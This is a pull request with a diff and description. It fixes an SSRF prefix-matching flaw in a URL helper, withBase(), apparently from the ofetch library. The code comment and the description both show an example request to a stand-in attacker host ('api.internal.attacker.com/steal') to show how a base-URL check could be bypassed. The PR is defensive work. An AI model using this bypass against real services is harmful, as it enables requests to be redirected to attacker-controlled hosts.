### PR TITLE
fix: enforce host boundary in withBase to prevent SSRF via prefix attack

### DIFF
--- a/src/utils.url.ts
+++ b/src/utils.url.ts
@@ -44,7 +44,13 @@ export function withBase(input = "", base = ""): string {
 
   const _base = withoutTrailingSlash(base);
   if (input.startsWith(_base)) {
-    return input;
+    // Ensure the match ends at a host/path boundary to prevent
+    // SSRF via prefix attacks (e.g. baseURL="http://api.internal"
+    // matching "http://api.internal.attacker.com/steal").
+    const nextChar = input[_base.length];
+    if (!nextChar || nextChar === "/" || nextChar === "?" || nextChar === "#") {
+      return input;
+    }
   }
 
   return joinURL(_base, input);


### PR DESCRIPTION
## Summary

Fixes #564

`withBase()` uses `startsWith()` to check if the input URL already contains the base URL. This allows SSRF via prefix attacks:

```typescript
// baseURL = 'http://api.internal'
await ofetch('http://api.internal.attacker.com/steal', {
  baseURL: 'http://api.internal'
});
// → Fetches http://api.internal.attacker.com/steal
//   completely bypassing base URL enforcement
```

## Fix

After the `startsWith` match, verify the next character is a valid URL boundary (`/`, `?`, `#`, or end-of-string). This prevents hostname suffix attacks.

| Input | Before | After |
|-------|--------|-------|
| `http://api.internal.attacker.com/steal` | ✅ returned as-is (SSRF!) | ❌ safely joined with base |
| `http://api.internal/users` | ✅ returned as-is | ✅ returned as-is |
| `http://api.internal?foo=bar` | ✅ returned as-is | ✅ returned as-is |
| `/users` | ✅ joined | ✅ joined |

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved URL base path resolution to properly validate boundary conditions, preventing incorrect URL concatenation when input already contains the base URL as a partial match.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->